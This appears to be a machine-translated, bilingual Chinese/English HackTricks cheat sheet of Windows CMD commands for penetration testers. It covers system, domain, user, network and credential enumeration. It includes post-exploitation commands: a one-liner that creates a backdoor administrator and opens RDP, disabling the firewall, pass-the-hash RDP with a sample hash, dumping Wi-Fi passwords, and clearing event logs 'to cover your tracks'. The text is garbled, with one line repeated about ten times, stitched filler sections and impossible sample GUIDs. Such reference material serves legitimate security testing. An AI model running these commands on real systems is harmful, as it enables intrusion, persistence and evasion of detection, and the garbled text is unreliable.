hacktricks/windows-hardening/basic-cmd-for-pentesters.md

Pentesters的基本Win CMD

☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• 你在一个网络安全公司工作吗？你想在HackTricks中看到你的公司广告吗？或者你想获得PEASS的最新版本或下载HackTricks的PDF吗？请查看订阅计划！
• 发现我们的独家NFTs收藏品The PEASS Family
• 获得官方PEASS和HackTricks周边产品
• 加入💬 Discord群组或电报群组或关注我在Twitter上的🐦@carlospolopm。
• 通过向hacktricks repo 和 hacktricks-cloud repo 提交PR来分享你的黑客技巧。

系统信息

版本和补丁信息

wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic computersystem LIST full #Get PC info

wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic qfe list brief #Updates

hostname

DRIVERQUERY #3rd party driver vulnerable?

环境

---

Basic CMD for Pentesters

渗透测试人员的基本CMD命令

---

CMD Basics

CMD基础知识

CMD (Command Prompt) is a command-line interpreter for Windows operating systems. It allows users to execute commands and perform various tasks using a text-based interface.

CMD（命令提示符）是Windows操作系统的命令行解释器。它允许用户使用基于文本的界面执行命令和执行各种任务。

Here are some basic CMD commands that can be useful for pentesters:

以下是一些对渗透测试人员有用的基本CMD命令：

System Information

系统信息

• systeminfo: Displays detailed information about the computer's hardware and software configuration.

• systeminfo：显示计算机硬件和软件配置的详细信息。

Network Information

网络信息

• ipconfig: Displays the IP configuration for all network interfaces on the computer.

• ipconfig：显示计算机上所有网络接口的IP配置。

• netstat: Displays active network connections, listening ports, and related network statistics.

• netstat：显示活动的网络连接、监听端口和相关的网络统计信息。

File and Directory Management

文件和目录管理

• dir: Lists the files and directories in the current directory.

• dir：列出当前目录中的文件和目录。

• cd: Changes the current directory.

• cd：更改当前目录。

• mkdir: Creates a new directory.

• mkdir：创建一个新目录。

• del: Deletes a file.

• del：删除一个文件。

Process Management

进程管理

• tasklist: Displays a list of currently running processes.

• tasklist：显示当前正在运行的进程列表。

• taskkill: Terminates a running process.

• taskkill：终止正在运行的进程。

User Management

用户管理

• net user: Displays information about user accounts and allows for user management.

• net user：显示有关用户帐户的信息，并允许进行用户管理。

Registry Management

注册表管理

• reg query: Displays the values and subkeys of a specified registry key.

• reg query：显示指定注册表键的值和子键。

• reg add: Adds a new registry entry or modifies an existing one.

• reg add：添加新的注册表项或修改现有的注册表项。

Service Management

服务管理

• sc query: Displays the status of services on the computer.

• sc query：显示计算机上服务的状态。

• sc start: Starts a service.

• sc start：启动一个服务。

• sc stop: Stops a running service.

• sc stop：停止正在运行的服务。

Task Scheduler

任务计划程序

• schtasks: Displays or modifies scheduled tasks on the computer.

• schtasks：显示或修改计算机上的计划任务。

Remote Desktop

远程桌面

• mstsc: Opens the Remote Desktop Connection client.

• mstsc：打开远程桌面连接客户端。

Conclusion

结论

These are just a few basic CMD commands that can be useful for pentesters. CMD provides a wide range of functionalities for managing and interacting with the Windows operating system. Exploring and understanding these commands can greatly enhance a pentester's capabilities.

这些只是一些对渗透测试人员有用的基本CMD命令。CMD提供了广泛的功能，用于管理和与Windows操作系统进行交互。探索和理解这些命令可以极大地增强渗透测试人员的能力。

set #List all environment variables

一些需要强调的环境变量：

• COMPUTERNAME: 计算机名称
• TEMP/TMP: 临时文件夹
• USERNAME: 用户名
• HOMEPATH/USERPROFILE: 主目录
• windir: C:\Windows
• OS: Windows 操作系统
• LOGONSERVER: 域控制器名称
• USERDNSDOMAIN: 用于 DNS 的域名
• USERDOMAIN: 域名

nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC

挂载的磁盘

When performing a penetration test on a Windows system, it is important to understand the mounted disks. Mounted disks are additional storage devices that have been attached to the system and are accessible to the operating system.

在对Windows系统进行渗透测试时，了解挂载的磁盘非常重要。挂载的磁盘是附加到系统上并可被操作系统访问的额外存储设备。

To view the mounted disks on a Windows system, you can use the mountvol command. This command displays a list of all the mounted volumes along with their corresponding volume names and paths.

要查看Windows系统上的挂载磁盘，可以使用mountvol命令。该命令会显示所有挂载卷的列表，包括相应的卷名和路径。

C:\> mountvol

Possible values for VolumeName along with current mount points are:

    \\?\Volume{d3e5e6f7-8a9b-1c2d-3e4f-5g6h7i8j9k0l}\
        *** NO MOUNT POINTS ***

    \\?\Volume{a1b2c3d4-e5f6-g7h8-i9j0-k1l2m3n4o5p6}\
        C:\

    \\?\Volume{m3n4o5p6-q7r8-s9t0-u1v2-w3x4y5z6a7b8}\
        D:\

The output of the mountvol command shows the volume names and their corresponding mount points. In the example above, the C: drive is mounted to the volume named {a1b2c3d4-e5f6-g7h8-i9j0-k1l2m3n4o5p6} and the D: drive is mounted to the volume named {m3n4o5p6-q7r8-s9t0-u1v2-w3x4y5z6a7b8}.

mountvol命令的输出显示了卷名及其相应的挂载点。在上面的示例中，C:驱动器挂载到名为{a1b2c3d4-e5f6-g7h8-i9j0-k1l2m3n4o5p6}的卷上，而D:驱动器挂载到名为{m3n4o5p6-q7r8-s9t0-u1v2-w3x4y5z6a7b8}的卷上。

Understanding the mounted disks can be useful during a penetration test as it allows you to identify additional storage devices that may contain sensitive information or provide potential attack vectors.

了解挂载的磁盘在渗透测试中非常有用，因为它可以帮助您识别可能包含敏感信息或提供潜在攻击向量的附加存储设备。

(wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)
wmic logicaldisk get caption,description,providername

防御者

回收站

dir C:\$Recycle.Bin /s /b

进程、服务和软件

Processes 进程

List processes 列出进程

To list all running processes, you can use the tasklist command:

tasklist

要列出所有正在运行的进程，可以使用 tasklist 命令：

tasklist

Kill a process 终止进程

To terminate a process, you can use the taskkill command followed by the process ID (PID) or the process name:

taskkill /PID <PID>
taskkill /IM <process_name>

要终止一个进程，可以使用 taskkill 命令，后面跟着进程的进程 ID（PID）或进程名：

taskkill /PID <PID>
taskkill /IM <process_name>

Services 服务

List services 列出服务

To list all services, you can use the sc command:

sc query

要列出所有服务，可以使用 sc 命令：

sc query

Start/Stop a service 启动/停止服务

To start or stop a service, you can use the sc command followed by the service name and the desired action:

sc start <service_name>
sc stop <service_name>

要启动或停止一个服务，可以使用 sc 命令，后面跟着服务名和所需的操作：

sc start <service_name>
sc stop <service_name>

Software 软件

List installed software 列出已安装的软件

To list all installed software, you can use the wmic command:

wmic product get name,version

要列出所有已安装的软件，可以使用 wmic 命令：

wmic product get name,version

schtasks /query /fo LIST /v #Verbose out of scheduled tasks
schtasks /query /fo LIST 2>nul | findstr TaskName
schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
tasklist /V #List processes
tasklist /SVC #links processes to started services
net start #Windows Services started
wmic service list brief #List services
sc query #List of services
dir /a "C:\Program Files" #Installed software
dir /a "C:\Program Files (x86)" #Installed software
reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software

域名信息

Whois

whois <domain>

使用whois命令可以获取域名的注册信息，包括注册人、注册商、注册日期等。

DNS

nslookup <domain>

使用nslookup命令可以查询域名的DNS记录，包括域名解析服务器和IP地址。

Zone Transfer

nslookup
> server <dns-server>
> ls -d <domain>

使用nslookup命令进行区域传输，可以获取域名的完整DNS记录。

MX Records

nslookup -type=mx <domain>

使用nslookup命令查询域名的MX记录，可以获取与该域名关联的邮件服务器信息。

SPF Records

nslookup -type=txt <domain>

使用nslookup命令查询域名的SPF记录，可以获取与该域名关联的反垃圾邮件策略信息。

Subdomains

nslookup -type=ns <domain>

使用nslookup命令查询域名的子域名，可以获取与该域名关联的子域名信息。

Zone Transfer

dig axfr @<dns-server> <domain>

使用dig命令进行区域传输，可以获取域名的完整DNS记录。

MX Records

dig mx <domain>

使用dig命令查询域名的MX记录，可以获取与该域名关联的邮件服务器信息。

SPF Records

dig txt <domain>

使用dig命令查询域名的SPF记录，可以获取与该域名关联的反垃圾邮件策略信息。

Subdomains

dig ns <domain>

使用dig命令查询域名的子域名，可以获取与该域名关联的子域名信息。

# Generic AD info
echo %USERDOMAIN% #Get domain name
echo %USERDNSDOMAIN% #Get domain name
echo %logonserver% #Get name of the domain controller
set logonserver #Get name of the domain controller
set log #Get name of the domain controller
gpresult /V # Get current policy applied
wmic ntdomain list /format:list	#Displays information about the Domain and Domain Controllers

# Users
dsquery user #Get all users
net user /domain #List all users of the domain
net user <ACCOUNT_NAME> /domain #Get information about that user
net accounts /domain #Password and lockout policy
wmic useraccount list /format:list #Displays information about all local accounts and any domain accounts that have logged into the device
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user GET ds_samaccountname #Get all users
wmic /NAMESPACE:\\root\directory\ldap PATH ds_user where "ds_samaccountname='user_name'" GET # Get info of 1 users
wmic sysaccount list /format:list # Dumps information about any system accounts that are being used as service accounts.

# Groups
net group /domain #List of domain groups
net localgroup administrators /domain #List uses that belongs to the administrators group inside the domain (the group "Domain Admins" is included here)
net group "Domain Admins" /domain #List users with domain admin privileges
net group "domain computers" /domain #List of PCs connected to the domain
net group "Domain Controllers" /domain #List PC accounts of domains controllers
wmic group list /format:list # Information about all local groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group GET ds_samaccountname #Get all groups
wmic /NAMESPACE:\\root\directory\ldap PATH ds_group where "ds_samaccountname='Domain Admins'" Get ds_member /Value #Members of the group
wmic path win32_groupuser where (groupcomponent="win32_group.name="domain admins",domain="DOMAIN_NAME"") #Members of the group

# Computers
dsquery computer #Get all computers
net view /domain #Lis of PCs of the domain
nltest /dclist:<DOMAIN> #List domain controllers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_samaccountname #All computers
wmic /NAMESPACE:\\root\directory\ldap PATH ds_computer GET ds_dnshostname #All computers

# Trust relations
nltest /domain_trusts #Mapping of the trust relationships

# Get all objects inside an OU
dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"

日志和事件

Logs and events are crucial sources of information for a pentester. They provide valuable insights into the activities and behaviors of a system or network. By analyzing logs and events, a pentester can identify vulnerabilities, detect suspicious activities, and gain a better understanding of the target environment.

日志和事件是渗透测试人员的重要信息来源。它们提供了有关系统或网络活动和行为的宝贵见解。通过分析日志和事件，渗透测试人员可以识别漏洞，检测可疑活动，并更好地了解目标环境。

Windows Event Logs

Windows事件日志

Windows operating systems generate various event logs that record important system events. These logs can be accessed using the Event Viewer tool or the command-line interface. The following are some commonly used Windows event logs:

Windows操作系统会生成记录重要系统事件的各种事件日志。可以使用事件查看器工具或命令行界面访问这些日志。以下是一些常用的Windows事件日志：

• Application Log: Records events related to applications and programs.

• 应用程序日志：记录与应用程序和程序相关的事件。

• Security Log: Records security-related events such as logon attempts, privilege use, and system access.

• 安全日志：记录与安全相关的事件，如登录尝试、权限使用和系统访问。

• System Log: Records events related to the operating system and system components.

• 系统日志：记录与操作系统和系统组件相关的事件。

• Setup Log: Records events related to the installation of software and hardware.

• 安装日志：记录与软件和硬件安装相关的事件。

• Forwarded Events: Records events forwarded from other computers in the network.

• 转发的事件：记录从网络中的其他计算机转发的事件。

Event Log Clearing

清除事件日志

As a pentester, it is important to clear event logs to cover your tracks and avoid detection. The following command can be used to clear event logs:

作为渗透测试人员，清除事件日志以覆盖你的踪迹并避免被检测是很重要的。可以使用以下命令清除事件日志：

wevtutil cl <log_name>

Replace <log_name> with the name of the event log you want to clear, such as "Application", "Security", or "System".

将<log_name>替换为要清除的事件日志的名称，例如“应用程序”、“安全”或“系统”。

Event Log Backup

事件日志备份

Backing up event logs is essential for preserving evidence and maintaining a record of system activities. The following command can be used to back up event logs:

备份事件日志对于保留证据和记录系统活动至关重要。可以使用以下命令备份事件日志：

wevtutil epl <log_name> <backup_file.evtx>

Replace <log_name> with the name of the event log you want to back up, and <backup_file.evtx> with the desired backup file name.

将<log_name>替换为要备份的事件日志的名称，将<backup_file.evtx>替换为所需的备份文件名。

Event Log Monitoring

事件日志监控

Monitoring event logs in real-time can help detect and respond to security incidents promptly. The following command can be used to monitor event logs:

实时监控事件日志可以帮助及时检测和响应安全事件。可以使用以下命令监控事件日志：

wevtutil qe <log_name> /f:text /c:1 /rd:true

Replace <log_name> with the name of the event log you want to monitor, such as "Application", "Security", or "System".

将<log_name>替换为要监控的事件日志的名称，例如“应用程序”、“安全”或“系统”。

Windows Event Forwarding

Windows事件转发

Windows Event Forwarding allows you to collect events from multiple computers in a centralized location for analysis. The following steps outline the process of configuring Windows Event Forwarding:

Windows事件转发允许你将多台计算机的事件收集到一个集中位置进行分析。以下步骤概述了配置Windows事件转发的过程：

1. Configure the event source computer to forward events to a collector computer.

2. Configure the collector computer to collect events from the event source computer.

3. Verify that events are being forwarded and collected successfully.

4. 配置事件源计算机将事件转发到收集器计算机。

5. 配置收集器计算机从事件源计算机收集事件。

6. 验证事件是否成功转发和收集。

Sysmon

Sysmon

Sysmon (System Monitor) is a powerful Windows utility that provides detailed information about system activity. It can be used to monitor and log events related to process creation, network connections, file creation, and more. Sysmon logs can be analyzed to identify malicious activities and indicators of compromise.

Sysmon（系统监视器）是一个强大的Windows实用程序，提供有关系统活动的详细信息。它可以用于监视和记录与进程创建、网络连接、文件创建等相关的事件。可以分析Sysmon日志以识别恶意活动和妥协指标。

Event Log Analysis

事件日志分析

Analyzing event logs is an essential part of the pentesting process. It helps identify security weaknesses, detect suspicious activities, and uncover potential attack vectors. The following are some key areas to focus on when analyzing event logs:

分析事件日志是渗透测试过程的重要组成部分。它有助于识别安全弱点，检测可疑活动，并揭示潜在的攻击向量。在分析事件日志时，应重点关注以下几个关键领域：

• Look for failed login attempts and brute-force attacks.

• 寻找登录尝试失败和暴力破解攻击。

• Identify privilege escalation attempts.

• 识别权限提升尝试。

• Monitor for suspicious network connections and traffic.

• 监控可疑的网络连接和流量。

• Analyze process creation events for signs of malicious activity.

• 分析进程创建事件以寻找恶意活动的迹象。

• Check for unauthorized access attempts and suspicious file modifications.

• 检查未经授权的访问尝试和可疑的文件修改。

By carefully analyzing event logs, a pentester can gain valuable insights into the security posture of a system or network and identify potential vulnerabilities or security breaches.

通过仔细分析事件日志，渗透测试人员可以深入了解系统或网络的安全状况，并识别潜在的漏洞或安全漏洞。

#Make a security query using another credentials
wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321

用户和组

用户

查看当前登录用户

whoami

查看所有用户

net user

查看用户详细信息

net user <username>

创建新用户

net user <username> <password> /add

删除用户

net user <username> /delete

修改用户密码

net user <username> <new_password>

组

查看所有组

net localgroup

查看组成员

net localgroup <groupname>

创建新组

net localgroup <groupname> /add

删除组

net localgroup <groupname> /delete

将用户添加到组

net localgroup <groupname> <username> /add

从组中删除用户

net localgroup <groupname> <username> /delete

#Me
whoami /all #All info about me, take a look at the enabled tokens
whoami /priv #Show only privileges

# Local users
net users #All users
dir /b /ad "C:\Users"
net user %username% #Info about a user (me)
net accounts #Information about password requirements
wmic USERACCOUNT Get Domain,Name,Sid
net user /add [username] [password] #Create user

# Other users looged
qwinsta #Anyone else logged in?

#Lauch new cmd.exe with new creds (to impersonate in network)
runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted

#Check current logon session as administrator using logonsessions from sysinternals
logonsessions.exe
logonsessions64.exe

用户组

User groups are a way to organize and manage users on a system. Each user can be a member of one or more groups, and groups can have certain permissions and access rights assigned to them. In Windows, there are several built-in groups that serve specific purposes. Here are some commonly used groups:

• Administrators: This group has full control over the system and can perform any administrative task.
• Users: This group includes all standard users on the system.
• Guests: This group provides limited access to the system for guest users.
• Power Users: This group has more privileges than standard users but fewer than administrators.
• Backup Operators: Members of this group can perform backup and restore operations on the system.
• Remote Desktop Users: This group is allowed to access the system remotely using Remote Desktop.
• Network Configuration Operators: Members of this group can manage network configuration settings.
• Print Operators: Members of this group can manage printers on the system.
• Event Log Readers: Members of this group can read event logs on the system.

To view the groups on a Windows system, you can use the net localgroup command. For example, to list all the groups, you can run:

net localgroup

To view the members of a specific group, you can use the net localgroup <groupname> command. For example, to view the members of the Administrators group, you can run:

net localgroup Administrators

To add a user to a group, you can use the net localgroup <groupname> <username> /add command. For example, to add a user named "john" to the Administrators group, you can run:

net localgroup Administrators john /add

To remove a user from a group, you can use the net localgroup <groupname> <username> /delete command. For example, to remove a user named "john" from the Administrators group, you can run:

net localgroup Administrators john /delete

Remember that administrative privileges are required to perform these operations.

#Local
net localgroup #All available groups
net localgroup Administrators #Info about a group (admins)
net localgroup administrators [username] /add #Add user to administrators

#Domain
net group /domain #Info about domain groups
net group /domain <domain_group_name> #Users that belongs to the group

列出会话

To list the active sessions in a Windows system, you can use the following command:

C:\> net session

This command will display a list of all active sessions on the system, including the username, computer name, and session ID.

qwinsta
klist sessions

密码策略

A strong password policy is essential for maintaining the security of a system. It helps to prevent unauthorized access and protects sensitive information. Here are some key elements to consider when implementing a password policy:

• Password Complexity: Require users to create passwords that are complex and difficult to guess. This can be achieved by enforcing a minimum length, including a combination of uppercase and lowercase letters, numbers, and special characters.

• Password Expiration: Set a time limit for password expiration. This ensures that users regularly update their passwords and reduces the risk of compromised accounts.

• Password History: Implement a password history feature that prevents users from reusing their previous passwords. This helps to prevent attackers from gaining access to an account by guessing a previously used password.

• Account Lockout: Implement an account lockout policy that temporarily locks an account after a certain number of failed login attempts. This helps to prevent brute-force attacks and unauthorized access.

• Password Recovery: Implement a secure password recovery process that verifies the identity of the user before allowing them to reset their password. This helps to prevent unauthorized password resets.

By implementing a strong password policy, organizations can significantly enhance the security of their systems and protect against unauthorized access.

net accounts

凭证

Credentials (凭证) 是用于验证用户身份的信息，通常包括用户名和密码。在渗透测试中，获取凭证是一项重要的任务，因为它可以帮助我们获得对目标系统的访问权限。

以下是一些常见的凭证获取技术：

• 社会工程学：通过欺骗、诱骗或操纵人员来获取凭证信息。
• 字典攻击：使用预先生成的密码列表尝试猜测用户密码。
• 暴力破解：通过尝试所有可能的密码组合来破解用户密码。
• 嗅探：截获网络流量以获取凭证信息。
• 中间人攻击：在用户和目标系统之间插入自己的设备，以截获凭证信息。
• 操作系统漏洞利用：利用操作系统的漏洞来获取凭证信息。

在渗透测试中，我们可以使用这些技术来获取目标系统的凭证，从而进一步深入系统并执行其他攻击。

cmdkey /list #List credential
vaultcmd /listcreds:"Windows Credentials" /all #List Windows vault
rundll32 keymgr.dll, KRShowKeyMgr #You need graphical access

持久化与用户

Add a user to the local administrators group

将用户添加到本地管理员组

net localgroup administrators <username> /add

Add a user to the local Remote Desktop Users group

将用户添加到本地远程桌面用户组

net localgroup "Remote Desktop Users" <username> /add

Add a user to the local Remote Management Users group

将用户添加到本地远程管理用户组

net localgroup "Remote Management Users" <username> /add

Add a user to the local Power Users group

将用户添加到本地Power Users组

net localgroup "Power Users" <username> /add

Add a user to the local Backup Operators group

将用户添加到本地备份操作员组

net localgroup "Backup Operators" <username> /add

Add a user to the local Performance Monitor Users group

将用户添加到本地性能监视器用户组

net localgroup "Performance Monitor Users" <username> /add

Add a user to the local Performance Log Users group

将用户添加到本地性能日志用户组

net localgroup "Performance Log Users" <username> /add

Add a user to the local Event Log Readers group

将用户添加到本地事件日志读取器组

net localgroup "Event Log Readers" <username> /add

Add a user to the local Distributed COM Users group

将用户添加到本地分布式COM用户组

net localgroup "Distributed COM Users" <username> /add

Add a user to the local IIS_IUSRS group

将用户添加到本地IIS_IUSRS组

net localgroup "IIS_IUSRS" <username> /add

Add a user to the local Cryptographic Operators group

将用户添加到本地加密操作员组

net localgroup "Cryptographic Operators" <username> /add

Add a user to the local Hyper-V Administrators group

将用户添加到本地Hyper-V管理员组

net localgroup "Hyper-V Administrators" <username> /add

Add a user to the local Hyper-V Administrators group

将用户添加到本地Hyper-V管理员组

net localgroup "Hyper-V Administrators" <username> /add

Add a user to the local Hyper-V Administrators group

将用户添加到本地Hyper-V管理员组

net localgroup "Hyper-V Administrators" <username> /add

Add a user to the local Hyper-V Administrators group

将用户添加到本地Hyper-V管理员组

net localgroup "Hyper-V Administrators" <username> /add

Add a user to the local Hyper-V Administrators group

将用户添加到本地Hyper-V管理员组

net localgroup "Hyper-V Administrators" <username> /add

Add a user to the local Hyper-V Administrators group

将用户添加到本地Hyper-V管理员组

net localgroup "Hyper-V Administrators" <username> /add

Add a user to the local Hyper-V Administrators group

将用户添加到本地Hyper-V管理员组

net localgroup "Hyper-V Administrators" <username> /add

Add a user to the local Hyper-V Administrators group

将用户添加到本地Hyper-V管理员组

net localgroup "Hyper-V Administrators" <username> /add

Add a user to the local Hyper-V Administrators group

将用户添加到本地Hyper-V管理员组

net localgroup "Hyper-V Administrators" <username> /add

Add a user to the local Hyper-V Administrators group

将用户添加到本地Hyper-V管理员组

net localgroup "Hyper-V Administrators" <username> /add

# Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN

# Add local user and put them local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD

# Add user to insteresting groups:
net localgroup "Remote Desktop Users" UserLoginName  /add
net localgroup "Debugger users" UserLoginName /add
net localgroup "Power users" UserLoginName /add

网络

接口、路由、端口、主机和DNS缓存

Interfaces (接口)

To view the network interfaces on a Windows system, you can use the ipconfig command. This command will display information about all the network interfaces, including their IP addresses, subnet masks, and default gateways.

ipconfig

Routes (路由)

To view the routing table on a Windows system, you can use the route print command. This command will display information about the routes configured on the system, including the destination network, subnet mask, gateway, and interface.

route print

Ports (端口)

To view the open ports on a Windows system, you can use the netstat command. This command will display a list of all the active connections and listening ports on the system.

netstat -ano

Hosts (主机)

To view the hosts file on a Windows system, you can use the notepad command. This command will open the hosts file in Notepad, allowing you to view and edit its contents.

notepad C:\Windows\System32\drivers\etc\hosts

DNSCache (DNS缓存)

To view the DNS cache on a Windows system, you can use the ipconfig /displaydns command. This command will display a list of all the DNS entries that have been cached by the system.

ipconfig /displaydns

ipconfig /all #Info about interfaces
route print #Print available routes
arp -a #Know hosts
netstat -ano #Opened ports?
type C:\WINDOWS\System32\drivers\etc\hosts
ipconfig /displaydns | findstr "Record" | findstr "Name Host"

防火墙

A firewall is a network security device that monitors and filters incoming and outgoing network traffic based on predetermined security rules. It acts as a barrier between a trusted internal network and an untrusted external network, such as the internet. Firewalls can be implemented as hardware devices or software programs.

防火墙是一种网络安全设备，根据预定的安全规则监控和过滤进出的网络流量。它充当可信任的内部网络和不可信任的外部网络（如互联网）之间的屏障。防火墙可以作为硬件设备或软件程序实现。

Firewalls can be configured to allow or block specific types of traffic based on various criteria, such as source IP address, destination IP address, port number, and protocol. They help protect networks from unauthorized access, malicious attacks, and data breaches.

防火墙可以根据各种标准（如源IP地址、目标IP地址、端口号和协议）配置允许或阻止特定类型的流量。它们有助于保护网络免受未经授权的访问、恶意攻击和数据泄露的影响。

Firewalls are an essential component of network security and are commonly used in both home and enterprise environments. They provide an additional layer of defense by controlling and monitoring network traffic, reducing the risk of unauthorized access and potential security breaches.

防火墙是网络安全的重要组成部分，广泛应用于家庭和企业环境。它们通过控制和监控网络流量提供了额外的防御层，降低了未经授权访问和潜在安全漏洞的风险。

netsh firewall show state # FW info, open ports
netsh advfirewall firewall show rule name=all
netsh firewall show config # FW info
Netsh Advfirewall show allprofiles

NetSh Advfirewall set allprofiles state off  #Turn Off
NetSh Advfirewall set allprofiles state on  #Trun On
netsh firewall set opmode disable #Turn Off

#How to open ports
netsh advfirewall firewall add rule name="NetBIOS UDP Port 138" dir=out action=allow protocol=UDP localport=138
netsh advfirewall firewall add rule name="NetBIOS TCP Port 139" dir=in action=allow protocol=TCP localport=139
netsh firewall add portopening TCP 3389 "Remote Desktop"

#Enable Remote Desktop
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh firewall add portopening TCP 3389 "Remote Desktop"
::netsh firewall set service remotedesktop enable #I found that this line is not needed
::sc config TermService start= auto #I found that this line is not needed
::net start Termservice #I found that this line is not needed

#Enable Remote Desktop with wmic
wmic rdtoggle where AllowTSConnections="0" call SetAllowTSConnections "1"
##or
wmic /node:remotehost path Win32_TerminalServiceSetting where AllowTSConnections="0" call SetAllowTSConnections "1"

#Enable Remote assistance:
reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fAllowToGetHelp /t REG_DWORD /d 1 /f
netsh firewall set service remoteadmin enable

#Ninja combo (New Admin User, RDP + Rassistance + Firewall allow)
net user hacker Hacker123! /add & net localgroup administrators hacker /add & net localgroup "Remote Desktop Users" hacker /add & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f & reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f & netsh firewall add portopening TCP 3389 "Remote Desktop" & netsh firewall set service remoteadmin enable

::Connect to RDP (using hash or password)
xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49

共享

Shares（共享）是指在Windows系统中共享文件夹或打印机，以便其他用户可以访问和使用它们。共享可以在本地网络上的多台计算机之间共享文件和资源。

查看共享

要查看当前系统上的共享，可以使用以下命令：

net share

这将显示所有共享的名称和路径。

创建共享

要创建一个新的共享，可以使用以下命令：

net share <share_name>=<path> [/GRANT:<user>,<permissions>] [/REMARK:<text>]

其中，<share_name> 是共享的名称，<path> 是共享的路径。可选的 /GRANT 参数用于指定用户和权限，/REMARK 参数用于添加备注。

删除共享

要删除一个共享，可以使用以下命令：

net share <share_name> /DELETE

其中，<share_name> 是要删除的共享的名称。

修改共享权限

要修改共享的权限，可以使用以下命令：

net share <share_name> /GRANT:<user>,<permissions>

其中，<share_name> 是要修改权限的共享的名称，<user> 是要授予权限的用户，<permissions> 是要授予的权限。

连接共享

要连接到一个共享，可以使用以下命令：

net use <drive_letter>: \\server\share [/USER:<user>] [<password>]

其中，<drive_letter> 是要分配给共享的驱动器号，\\server\share 是共享的路径，/USER 参数用于指定用户名，<password> 是用户的密码。

断开共享连接

要断开与共享的连接，可以使用以下命令：

net use <drive_letter> /DELETE

其中，<drive_letter> 是要断开连接的驱动器号。

net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares

Wifi（无线网络）

查看已连接的Wifi网络

netsh wlan show interfaces

查看可用的Wifi网络

netsh wlan show networks

连接到Wifi网络

netsh wlan connect name="Wifi名称"

断开Wifi网络连接

netsh wlan disconnect

查看已保存的Wifi密码

netsh wlan show profile name="Wifi名称" key=clear

忘记已保存的Wifi密码

netsh wlan delete profile name="Wifi名称"

创建Wifi热点

netsh wlan set hostednetwork mode=allow ssid="热点名称" key="密码"
netsh wlan start hostednetwork

停止Wifi热点

netsh wlan stop hostednetwork

查看已连接的Wifi客户端

netsh wlan show hostednetwork

共享网络连接

netsh wlan set hostednetwork mode=allow ssid="热点名称" key="密码"
netsh wlan start hostednetwork

停止网络连接共享

netsh wlan stop hostednetwork

查看已共享的网络连接

netsh wlan show hostednetwork

修改Wifi热点设置

netsh wlan set hostednetwork mode=allow ssid="热点名称" key="密码"
netsh wlan stop hostednetwork
netsh wlan start hostednetwork

netsh wlan show profile #AP SSID
netsh wlan show profile <SSID> key=clear #Get Cleartext Pass

SNMP

SNMP（Simple Network Management Protocol）是一种用于管理和监控网络设备的协议。它允许管理员通过发送和接收消息来获取有关设备的信息，例如系统状态、网络流量和错误报告。SNMP使用基于UDP的传输协议，并使用MIB（Management Information Base）来定义设备上可用的信息。攻击者可以利用SNMP协议来收集有关目标网络设备的信息，例如操作系统版本、开放端口和配置设置。这些信息可以帮助攻击者识别潜在的漏洞和攻击路径。

reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s

网络接口

Network interfaces, also known as network adapters or NICs (Network Interface Cards), are hardware devices that allow computers to connect to a network. They provide the necessary physical connection between the computer and the network, enabling data transmission.

网络接口，也称为网络适配器或NIC（网络接口卡），是允许计算机连接到网络的硬件设备。它们提供了计算机与网络之间的必要物理连接，实现数据传输。

In Windows, you can view and manage network interfaces using the ipconfig command. This command displays detailed information about each network interface, including its IP address, subnet mask, default gateway, and more.

在Windows中，您可以使用ipconfig命令查看和管理网络接口。该命令显示每个网络接口的详细信息，包括其IP地址、子网掩码、默认网关等。

To view the network interfaces, open a command prompt and type ipconfig. This will display a list of all network interfaces on the system, along with their corresponding information.

要查看网络接口，请打开命令提示符并键入ipconfig。这将显示系统上所有网络接口的列表，以及它们的相应信息。

You can also use the ipconfig /all command to view additional information about the network interfaces, such as the MAC address, DNS servers, and DHCP lease information.

您还可以使用ipconfig /all命令查看有关网络接口的其他信息，例如MAC地址、DNS服务器和DHCP租约信息。

In addition to ipconfig, you can use the netsh command to manage network interfaces. The netsh command provides more advanced options for configuring and troubleshooting network interfaces.

除了ipconfig，您还可以使用netsh命令来管理网络接口。netsh命令提供了更高级的选项，用于配置和故障排除网络接口。

For example, you can use the netsh interface show interface command to display a list of all network interfaces, along with their operational status and other information.

例如，您可以使用netsh interface show interface命令显示所有网络接口的列表，以及它们的操作状态和其他信息。

Understanding and managing network interfaces is essential for network troubleshooting and configuration. By using the appropriate commands, you can easily view and modify network interface settings to ensure optimal network connectivity.

ipconfig /all

ARP表

The ARP (Address Resolution Protocol) table is a network mapping table that associates IP addresses with their corresponding MAC addresses. It is used by network devices to determine the MAC address of a destination IP address before sending data packets. The ARP table is stored in the memory of a device and is constantly updated as devices communicate on the network.

